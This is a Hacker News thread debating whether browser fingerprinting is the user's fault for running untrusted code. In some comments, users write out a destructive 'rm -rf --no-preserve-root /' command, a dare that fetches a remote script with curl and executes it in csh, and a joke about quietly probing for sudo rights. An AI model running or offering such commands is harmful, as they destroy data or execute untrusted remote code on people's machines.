Hacker News new | ask | show | jobs
by KingMachiavelli 2023 days ago
> It is without consent and it is without user control

How is that true? If you don't visit X site then X site can't fingerprint you. I'd say technically it's the user's fault if they run random code on their computer and using a browser that sends this information back to the fingerprinting party.

I'd say most of the best sites of the internet could be read just fine w/o Javascript or even with just wget.

If someone made an application that downloaded web pages and executed the contents with SUDO privileges, would I be exploiting someone if my website was 'rm -rf --no-preserve-root /'?
3 comments
caconym_ 2023 days ago
Getting browser-fingerprinted is technically the user’s fault in the same way it’s technically my fault if I die in a car crash because of some mechanical defect that I could have detected if I’d just made a habit of regularly dismantling my car to inspect every part of it, applying expert engineering knowledge to identify and fix any dangerous problem(s) (including design defects).

Allowing predatory and/or negligent entities to entrap people with less-than-expert knowledge of the relevant industry/technology/whatever is something we should avoid if our goal is to build a society for the common good. The whole point is to watch each other’s backs, not to create a web of obscure threats where only the truly paranoid can remain safe and avoid being exploited.

link
rhizome 2023 days ago
>Allowing predatory and/or negligent entities to entrap people with less-than-expert knowledge of the relevant industry/technology/whatever

Indeed, a lot of companies are paying a lot of people a lot of money to spend a lot of their working hours figuring out newer and more-resilient ways of doing this stuff. How long has it been since persistent Flash cookies? Looks like sometime around 2009:

https://en.wikipedia.org/wiki/Local_shared_object#Privacy_co...

I think there's a project out there for an enterprising public-interest researcher to graph how many of these attempts and techniques were developed and popularized after Facebook started allowing people outside of universities to register for an account.

link
_def 2023 days ago
> If someone made an application that downloaded web pages and executed the contents with SUDO privileges, would I be exploiting someone if my website was 'rm -rf --no-preserve-root /'?

Yes.

link
KingMachiavelli 2023 days ago
I'll take that bet. Whatever you do don't run this!

> csh -c $(curl dev.sansorgan.es)

(I specified csh as anyone willing to try this probably wouldn't have it installed).

link
LinuxBender 2023 days ago
Remember to test with

  sudo -n
You don't want to give away that you are using sudo to anyone that does not first read the script.
link
h_anna_h 2023 days ago
Guess your post is exploiting these that run a script that executes random commands that they find online with root privileges. Better pay up.
link
dabbledash 2023 days ago
“If someone gave me the key to their front door so I could drop off amazon packages but I actually used it to come in and destroy all their valuables would it really be MY fault?”

Yes.

link
KingMachiavelli 2023 days ago
The action of destroying the valuables is the crime. Writing down instructions on how to destroy them is just speech. If the owner (or someone else) executes those instructions then they are the actor and the responsible party.
link
MauranKilom 2023 days ago
But you're not just leaving instructions, you're turning on the water and firing up the stove.
link